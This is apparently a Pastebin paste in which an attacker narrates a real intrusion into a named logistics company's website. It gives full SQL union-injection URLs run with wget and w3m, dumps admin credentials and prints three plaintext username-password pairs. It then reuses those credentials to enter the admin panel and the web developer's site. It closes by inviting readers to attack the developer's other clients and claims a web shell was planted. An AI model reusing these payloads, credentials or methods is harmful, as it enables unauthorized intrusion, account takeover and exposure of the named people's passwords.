Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ../password_reuse_multi-pwn_like_an_old_school_hacker
- /bit/and/cheese
- ~/today i'll walk u through an epitome of password reuse - and how we pwn several sites with simple vulns_ anatomy of this tutorial is simple:_
- = using only w3m + wget - because im old school & fucking cool
- = union injection
- = exploit password reuse
- $ first we got a target
- wget -S --spider "http://whitearrowlogistics.com/storage.asp?id=19\'"
- HTTP request sent, awaiting response...
- HTTP/1.1 500 Internal Server Error <<< status code is true
- Date: [n/a]
- Server: Microsoft-IIS/6.0
- X-Powered-By: PleskWin
- X-Powered-By: ASP.NET
- $ now we use w3m to confirm
- w3m -dump "http://whitearrowlogistics.com/storage.asp?id=19\'"|grep 'error'|less
- Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
- [MySQL][ODBC 3.51 Driver]
- $ vulnerable - mysql - so we need to find the version_ most mysql version has 'community' in it - so we gonna grep this (since the output was cluttered - we're gonna mark the out put with square brackets = 0x5b 0x5d)
- w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x5b,@@version,0x5b,0x2e%29,null,null--'|grep community|less
- $ next we seek for current db
- w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x2e,0x5b,database(),0x5d,0x2e%29,null,null--'|grep 'db'|less
- $ now we dump the username and password
- w3m -dump http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,%28select%20concat%280x7174696a71,ifnull%28cast%28password%20as%20char%29,0x3c62722f3e20%29,0x66727378756d,ifnull%28cast%28username%20as%20char%29,0x3c62722f3e20%29,0x716c627571%29%20from%20whitearrowdb.admin_users%20limit%202,1%29,null,null--|less
- $ voila!_
- user pass
- nigel neubiberg1
- ken na691500a
- mark whitearrow682424
- $ these blokes used strong pass - too bad they were in plain text!_ time to search for login page
- wget -S --spider http://www.whitearrowlogistics.com/login/
- wget -S --spider http://www.whitearrowlogistics.com/admin/
- $ got lucky on 2nd try_ let's login..._ with w3m (love the jap for this)
- w3m http://www.whitearrowlogistics.com/admin/
- $ magic!_ now we notice a line at bottom of the admin page said >> Please contact sales@e-cc.org 'blah blah' << it mean we have found the CMS dev_ let's see if we can pwn it too - find admin page
- wget -S --spider http://www.whitearrowlogistics.com/admin/
- $ same page as the last target - let's try to login with the user/pass we have
- w3m http://www.whitearrowlogistics.com/admin/
- $ w00t!_ same pass & usr!
- $$
- $ let's recon the site with Bing search using site:
- w3m -dump 'http://www.bing.com/search?q=site:e-cc.org+asp?id=&go=&filt=all&first=1'|less
- $ first search result said >> www.e-cc.org/webdesigners.asp?id=6 << let's check if this vuln too
- wget -S --spider www.e-cc.org/webdesigners.asp?id=6
- $$ it gave a 500_ responded said ADODB.Command error '800a0d5d' - in fact - almost all of their clients' website have some kind of database errors_ i'll leave this here for you guys to pickup_
- $ i already shelled the site - so see that as an easter egg ;-)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement